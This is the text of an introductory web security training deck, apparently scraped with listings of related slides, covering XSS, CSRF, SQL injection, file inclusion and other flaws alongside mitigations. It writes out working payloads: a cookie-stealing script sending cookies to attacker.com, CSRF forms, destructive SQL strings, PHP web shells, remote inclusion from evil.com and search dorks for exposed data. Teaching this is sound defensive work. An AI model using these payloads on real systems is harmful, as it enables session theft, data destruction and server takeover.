Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
 
Basics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingBasics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty Hunting
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 

Dernier

Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Brian Pichman
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopBachir Benyammi
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXTarek Kalaji
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7DianaGray10
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 

Dernier (20)

Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBX
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
20230104 - machine vision
20230104 - machine vision20230104 - machine vision
20230104 - machine vision
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 

Web Security - Introduction v.1.3

  • 1. Web Security [websec] Introduction Prepared by Oles Seheda
  • 2. Agenda  Why web?  Google hacking  $GET_READY (browser and proxy)  Session hijacking (XSS, Session Fixation, Brute force)  How to... easy passwords  CSRF  SQL injection and other injection types  Parameter tampering  File inclusion, path traversal  Unrestricted file upload  Tools  Theory & Practice resources  Q&A
  • 3. Agenda Vulnerability More info Overview Mitigation Image Tools Examples Demonstration Usage
  • 5. Intro Quality is not only functionality* *(Implemented and tested requirements) Non-functional? Baseline Load Security Compatibility L10n and i18n Scalability Compliance Performance Stress Documentation Recovery Usability Endurance Resilience Volume
  • 6. Intro Quality is value to some person - Jerry Weinberg
  • 7. Intro 75% of cyber attacks and Internet security violations are generated through Internet applications Source: Gartner Group
  • 8. Intro Amateurs hack systems, professionals hack people - Bruce Schneier
  • 9. Social Engineering Social Engineering Social Engineering is the act of manipulating a person to accomplish goals that may or may not be in the "target's" best interest. This may include obtaining information, gaining access, or getting the target to take certain action.
  • 10. Social Engineering Social Engineering techniques • Pretexting • Diversion theft • Phishing • Vishing (IVR or phone phishing) • Baiting (Trojan Horse) • Quid pro quo (something for something) Useful resource The Official Social Engineering Portal http://www.social-engineer.org/
  • 11. Disclaimer ***** All the information provided in this presentation are for educational purposes only. The speaker is no way responsible for any misuse of the information. Use it on our own risk! *****
  • 12. Google Hacking Google Hacking AKA: Google Dorks, Google scanning, Search engine hacking Google hacking is the term used when an attacker tries to find exploitable targets or/and sensitive data by using advanced operators in search engines or code search engines. Main targets are software vulnerabilities and misconfigurations.
  • 13. Google Hacking Examples Search for vulnerable software intitle:powered by wordpress Logs containing usernames and/or passwords "admin account info" filetype:log Open webcams inurl:/view/index.shtml SQL injection inurl:"id=" inurl:index.php?id= Vkontakte.ru - deleted photos site:vkontakte.ru "Фотографии со страницы DELETED" Directory indexing (listing) intitle:index.of RFI inurl:index.php?page=
  • 14. Google Hacking The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Useful resources Google Hacking Database (GHDB) http://www.exploit-db.com/google-dorks/ http://www.hackersforcharity.org/ghdb/ Google Hacking Diggity Project http://www.stachliu.com/resources/tools/google-hacking-diggity-project/
  • 15. Google Hacking Mitigation 1. Do not upload info that you are not comfortable to share with whole world 2. Mask server software that you are running on (e.g., default error messages) 3. Use META tags <meta name="GOOGLEBOT" content="NOINDEX"/> 4. Use robots.txt User-agent: * Disallow: /private/ 5. Use http://www.google.com/remove.html Tools SiteDigger Goolag (Gooscan)
  • 16. Get ready For web security testing we need the following tools: 1. Browser 2. Proxy
  • 17. Browsers Browsers can block reflected XSS??? Chrome 16, 17, 18 Yes IE 9, 10 Yes Firefox 8, 9, 10 No Opera 12 No Safari 5.1 Yes Source: http://browserscope.org/?category=security
  • 18. Browsers The Hacker Firefox Sandcat Browser http://sourceforge.net/projects/hackfox/ http://syhunt.com/?n=Sandcat.Browser Firefox add-ons: Features: • Firebug • Live HTTP Headers • Tamper Data • Request Editor extension • Web Developer • Fuzzer • HackBar • JavaScript Executor extension • Poster • Lua Executor extension • Live HTTP Headers • Syhunt Gelo • and more… • HTTP Brute Force • CGI Scanner scripts • and more…
  • 19. Browsers Mantra http://www.getmantra.com/ Firefox add-ons: • Firebug • Cookies Manager+ • SQLite Manager • Firecookie • Hackbar • Autofill Forms • Tamper Data • Modify Headers • Live HTTP Headers • Poster • Web Developer • SeleniumIDE • SQL Inject Me • Websecurify • XSS Me • FoxyProxy • and more…
  • 21. Session Hijacking Session Hijacking Session hijacking is the act of taking control of a user session after successfully obtaining or generating an authentication session ID. Methods 1. Capture/Steal (sniffing, MitM, XSS) 2. Fixation 3. Prediction (calculate, fuzzing, brute force)
  • 22. Cross-Site Scripting Cross-Site Scripting AKA: CSS, XSS XSS is a type of vulnerability in web applications which allow code injection by malicious web users into the web pages viewed by other users. Types Type 1: Non-persistent, Non-permanent, Reflected, First-order, Passive Type 2: Persistent, Permanent, Stored, Second-order, Active
  • 23. Cross-Site Scripting | Reflected ‫׼‬http://example.com http://example.com/search?q=<script>alert(XSS)</script> http://example.com/<script>alert(XSS)</script> A XSS OK Cookie grabber or malicious web site ‫׼‬http://example.com/<script>code</script> V
  • 24. Cross-Site Scripting | Reflected Examples http://example.com/search?q=<script>document.location='htt p://attacker.com/cg.php?cookie='+document.cookie</script> Masking malicious URL URL escaping (http://scriptasylum.com/tutorials/encode-decode.html): http://example.com/search?q=%3C%73%63%72%69%70%74%3E%64%6F %63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74% 74%70%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%63%6 F%6D%2F%63%67%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%2B%64 %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72% 69%70%74%3E URL shortening: http://goo.gl/SWC0D http://bit.ly/wFFW13 http://tinyurl.com/6lmthu7 http://ow.ly/8lPYg http://is.gd/b1MkPT
  • 25. Cross-Site Scripting | Stored ‫׼‬http://example.com <img height="0" width="0" src=code> A XSS OK Cookie grabber or malicious web site DB ID=7 ‫׼‬http://example.com V
  • 26. Cross-Site Scripting | Stored Examples <h1>LOL<blink><marquee><br><br>XSS <script>alert(1)</script> "><script>alert(1)</script><!— <script type="text/javascript" src=alert(1)></script> <b onMouseOver=alert(1)>bolded text</b> <form><button formaction="javascript:alert(1)">xss <video><source onerror="javascript:alert(1)“ <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <math href="javascript:alert(1)">CLICKME</math>
  • 27. Cross-Site Scripting Mitigation 1. Filter all input 2. Escape all output 3. Encoding of all HTML special characters (in potentially malicious data) before display by web applications (or client- side script) AKA quoting or escaping <script>alert('xss');</script> V V V &lt;script&gt;alert('xss');&lt;/script&gt; 4. Whitelist is better then blacklist policy (blacklist easier to bypass)
  • 28. Cross-Site Scripting Useful resources XSS cheat sheet http://ha.ckers.org/xss.html http://html5sec.org/ http://www.xenuser.org/xss-cheat-sheet/ </xssed> - xss attacks information http://www.xssed.com/ Tools XSSer XSS-Proxy XSS Me (Firefox add-on) X5s (Fiddler add-on) DOM XSS Scanner (http://www.domxssscanner.com/)
  • 29. Session Fixation Session fixation Session fixation attacks attempt to exploit the vulnerability of a system which allows one person to fixate (set) another person's session identifier (SID).
  • 30. Session Fixation ‫׼‬http://example.com A Set-Cookie: SESSIONID=1234 ‫׼‬http://example.com http://example.com/login.php?SESSIONID=1234 Login V Password OK
  • 31. Session Fixation Examples Using URL http://example.com/;JSESSIONID=1234 (J2EE) http://example.com/?PHPSESSID=1234 (PHP) Using XSS http://example.com/<script>document.cookie="SESSIONID=1234";</scr ipt> http://example.com/<script>document.cookie="SESSIONID=1234;%20Exp ires=Friday,%201-Jan2015%2000:00:00%20GMT";</script> Using Meta tag http://example.com/<meta%20http-equiv=Set- Cookie%20content="SESSIONID=1234">
  • 32. Session Fixation Mitigation 1. Regenerate session ID after a successful login 2. Validate user specific data (Agent, IP, HTTP-X-Forwarded-For etc)
  • 33. Fuzzing Fuzzing AKA: Fuzz testing Fuzzing is a software testing technique, often automated or semi- automated, that involves providing invalid, unexpected, or random data to the inputs of a web application or computer program. Fuzzing is commonly used to test for security problems in software or computer systems.
  • 34. Brute Force Brute Force Brute-force attacks are mainly used for guessing passwords and bypassing access control. Types Dictionary attack Hybrid attack Search attack (Brute Force) Rainbow table (Memory Trade Off Attacks)
  • 35. Brute Force Mitigation 1. Use CAPTHA 2. Use timeout 3. Black list suspicious IPs Tools THC Hydra Medusa Burp Suite MD5 Cracker online resources More at http://sectools.org/tag/crackers/
  • 36. Easy Password v1 PasswordCard (http://www.passwordcard.org) My Facebook password is -  8 RED (3) symbols from right to left: 5R6wfc86 (to hack this password it would take about 106 years) http://howsecureismypassword.net/
  • 37. Easy Password v2 I used to be an adventurer like you, then I took an arrow in the knee… - Every Skyrim guard
  • 38. Easy Password v2 I used to be an adventurer like you, then I took an arrow in the knee… i = 1, !, l iutbaaly a = @, 4 !uTb@aly 8 symbols s = $, 5 8 symbols (about 13 minutes to hack) (about 18 days to hack) g = 9, 6 Host: facebook.com DOB: 12.06 mk12!uTb@aly06cf 16 symbols (about 193 trillion years to hack)
  • 39. Cross-Site Request Forgery Cross-Site Request Forgery AKA: CSRF (sea surf), XSRF, Session Ridding, One-click, Confused Deputy CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated.
  • 40. Cross-Site Request Forgery http://example.com/acc?newpass=123qwe&confirmpass=123qwe A ‫׼‬http://example.com Password was changed successfully Malicious web site OK V
  • 41. Cross-Site Request Forgery Examples Using URL http://example.com/changePswd?newPswd=123qwe&confirm=123qwe Typical Payloads Formatting <img src="http://example.com/changePswd?newPswd=123qwe> <img height="0" width="0" src="http://example.com/edit?mail=x@example.com"> <iframe src="http://example.com/transfer?amount=1500&destAcc=123456">
  • 42. Cross-Site Request Forgery Examples Iframe <iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe> <form name="csrf" action="http://example.com/account/edit" method="post" target="hidden"> <input type="hidden" name="email" value="attacker@example.com"/> <script>document.csrf.submit();</script> HTML Form <html> <body> <form method=POST action=" http://example.com/account/edit"> <input type="text" name="email" value="attacker@example.com"> <input type="submit" id="submit"> </form> <script> document.getElementById("submit").click(); </script> </body> </html>
  • 43. Cross-Site Request Forgery Mitigation 1. Use POST rather than GET in forms (partial solution) 2. Check HTTP Referrer header 3. Require verification (password, CAPTCHA) 4. Use session tokens (hash, secret) <input type="hidden" name="sessid" id="sessid" value="sdf8awh2oid0fh"> Tools Pinata CSRFTester CSRF Formbuilder and Formgrabber
  • 44. SQL Injection SQL Injection AKA: SQLi, SQLia SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application.
  • 45. SQL Injection ‫׼‬http://example.com A Login Login: admin Password Password: x' or '1'='1' -- OK OK DB WebApp TRUE SELECT * FROM users WHERE login = '$login' AND password = '$password'; SELECT * FROM users WHERE login = ‘'admin' AND password = 'x' OR '1'='1' --
  • 46. SQL Injection Examples http://example.com/vip?id=-1 http://example.com/vip?id=3' True/false ' and 1=1 (true) ' and 2=1 (false) Time based ' wait for delay '0:0:15' ' and sleep(15) Guessing number of fields ' union select 1,2 # ' group by 2 # ' order by 2 # ' union select null,@@version # ' union select null,table_name from information_schema.tables # Semicolon for statement termination '; drop table tableName; # '; update tableName set filedName='value' where...; --
  • 47. SQL Injection Useful resources SQLi cheat sheet http://ha.ckers.org/sqlinjection/ http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/ http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet http://www.michaelboman.org/books/sql-injection-cheat-sheet-mssql Tools sqlmap sqlninja Havij Power Injector SQL Inject Me (Firefox add-on)
  • 48. SQL Injection Mitigation 1. Escape/Quotesafe the input (string quoting/parsing) 2. Filter input (use whitelists not blacklists) 3. Use mechanisms that enforce separation between data and code (prepared statements, parameterized queries, or stored procedures) 4. Limit database permissions (start with the lowest permissions) 5. Handle errors
  • 49. Email Injection Email Injection AKA: Email Header Injection Email injection is a vulnerability that can occur in web applications that are used to send email messages. User may exploit the MIME format to append additional information to the message being sent, such as a new list of recipients or a completely different message body or to send large numbers of messages anonymously.
  • 50. Email Injection Examples TO: user@example.com%0Ato:attacker@example.com TO: user@example.com%0D%0Ato:attacker@example.com TO: user@example.com%0Abcc:attacker@example.com TO: user@example.com%0ASubject:Free%20Viagra Note: Windows uses a CR and LF for new Line Linux uses only LF Where: %0A = LF, line feed, newline (n) %0D = CR, carriage return (r) Mitigation 1. Filter input for "r" and "n"
  • 51. Parameter Tampering Parameter Tampering AKA: Parameter manipulation, Insecure direct object reference Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc.
  • 52. Parameter Tampering Examples Form fields <input type="hidden" id="791" name="cost" value="19.99"> URL parameters http://example.com/accinfo?accID=5 http://example.com/buy?itemId=5&ammount=1&price=2.51 Cookies role=user; Requests POST /index.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/9.0.1 Accept-Language: en-US,en;q=0.8,hi-IN;q=0.5,hi;q=0.3 Proxy-Connection: keep-alive Referer: http://192.168.56.102/dvwa/vulnerabilities/xss_s/ Cookie: security=low; PHPSESSID=ioodvlu1e0re8draciu5bk1qc3 Content-Type: application/x-www-form-urlencoded Content-Length: 45 name=test&price=50
  • 53. Parameter Tampering Mitigation 1. All input must be validated server side for each request (client side validation is easy to bypass) 2. Use parameter and cookie encryption 3. Do not show internals (such as IDs) to end user (use sessions) 4. Use indirect reference map with hard to guess keys (hash) http://example.com/accinfo?accID=zS8an31g where zS8an31g=5 Tools Burp Suite WebScarab Paros Proxy Tamper Data (Firefox add-on)
  • 54. Unrestricted File Upload Unrestricted File Upload Uploaded files represent a significant risk to applications. If the attacker succeeds with uploading malicious file to the system consequences can vary, including complete system takeover.
  • 55. Unrestricted File Upload Examples <?php passthru($_GET['cmd']);?> <? system($_REQUEST['cmd']); ?> <?php eval($_GET[cmd])?> Mitigation 1. Filter input (file extension) 2. Use Content-Type request header 3. Use file type recognizer (resizer) 4. Proper server configuration (restrict permissions)
  • 56. File Inclusion File Inclusion AKA: Local File Inclusion (LFI), Remote File Inclusion (RFI) File inclusion is an attack technique when web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including (remote) files with malicious code. http://example.com/index.php?page=pageName
  • 57. File Inclusion Examples Local file inclusion (LFI) http://example.com/index.php?page=/opt/upload/shell.php http://example.com/index.php?page=C:ftpuploadshell.php http://example.com/index.php?page=../../../../etc/httpd/log/error _log&cmd=... Remote file inclusion (RFI) http://example.com/index.php?page=http://evil.com/ http://example.com/index.php?page=http://evil.com/malicous.txt?
  • 58. Path Traversal Path Traversal (Type of LFI) AKA: Directory Traversal, Dot-Dot-Slash, Directory Climbing, Backtracking Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. The most basic Path Traversal attack uses the '../' special character sequence to alter the location of the request.
  • 60. File Inclusion Mitigation 1. Filter input 2. Test incoming value against a regular expression 3. Compare incoming value against an array of all possible legal values 4. Proper server configuration (restrict permissions or/and disallow external include) Tools Fimap (RFI/LFI scanner) Local File Inclusion Vulnerability Scanner
  • 61. Imperva Top 4 Web Application Attack Report 4% 37% 36% Directory traversal SQL injection 23% XSS RFI
  • 62. OWASP Top 10 The OWASP Top 10 Web Application Security Risks for 2010 are: 01 Injection 02 Cross-Site Scripting (XSS) 03 Broken Authentication and Session Management 04 Insecure Direct Object References 05 Cross-Site Request Forgery (CSRF) 06 Security Misconfiguration 07 Insecure Cryptographic Storage 08 Failure to Restrict URL Access 09 Insufficient Transport Layer Protection 10 Unvalidated Redirects and Forwards
  • 63. CWE Top 25 2011 CWE/SANS Top 25 Most Dangerous Software Errors 01 Improper Neutralization of Special Elements used in an SQL Command 02 Improper Neutralization of Special Elements used in an OS Command 03 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') 04 Improper Neutralization of Input During Web Page Generation (XSS) 05 Missing Authentication for Critical Function 06 Missing Authorization 07 Use of Hard-coded Credentials 08 Missing Encryption of Sensitive Data 09 Unrestricted Upload of File with Dangerous Type 10 Reliance on Untrusted Inputs in a Security Decision 11 Execution with Unnecessary Privileges 12 Cross-Site Request Forgery (CSRF) 13 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') 14 Download of Code Without Integrity Check 15 Incorrect Authorization 16 Inclusion of Functionality from Untrusted Control Sphere 17 Incorrect Permission Assignment for Critical Resource 18 Use of Potentially Dangerous Function 19 Use of a Broken or Risky Cryptographic Algorithm 20 Incorrect Calculation of Buffer Size 21 Improper Restriction of Excessive Authentication Attempts 22 URL Redirection to Untrusted Site 23 Uncontrolled Format String 24 Integer Overflow or Wraparound 25 Use of a One-Way Hash without a Salt
  • 64. Tools Vulnerability scanners: • Acunetix WVS • W3af • Skipfish • Grendel-Scan • AppScan • Websecurify • HP WebInspect • Burp Suite • Nikto (Wikto) • Uniscan • Netsparker • and more Pentest Linux back|track - http://www.backtrack-linux.org/ backbuntu - http://www.blackbuntu.com/ backbox - http://www.backbox.org/ Find more at… http://sectools.org/tag/web-scanners/ http://www.owasp.org/index.php/Phoenix/Tools
  • 65. Looking for theoretical background? OWASP https://www.owasp.org/ WASC http://projects.webappsec.org Vulnerapedia http://lab.gsi.dit.upm.es/semanticwiki/index.php/Main_Page CWE http://cwe.mitre.org/index.html Securiteam http://www.securiteam.com/ Tracker of vulnerable sites http://www.vulntraq.com/ OWASP CAL9000 Project
  • 66. Theory is boring… what about some practical lessons? WebGoat https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project DVWA (Damn Vulnerable Web Application) http://www.dvwa.co.uk/ Web Application Exploits and Defenses http://google-gruyere.appspot.com/ Mutillidae http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable- php-owasp-top-10 Stanford SecuriBench http://suif.stanford.edu/~livshits/securibench/ Online hacking quests http://mod-x.com http://hax.tor.hu http://www.hackthissite.org/ https://www.hacking-lab.com/
  • 67. Main security rules 1. Do not trust user input – Use whitelists rather blacklists – Use server side validation 2. Start with least privileges 3. Keep sensitive information safely
  • 68. Questions? 问题和答案 Thanks for listening! To be continued… mail: oles.seheda@gmail.com skypename: oseheda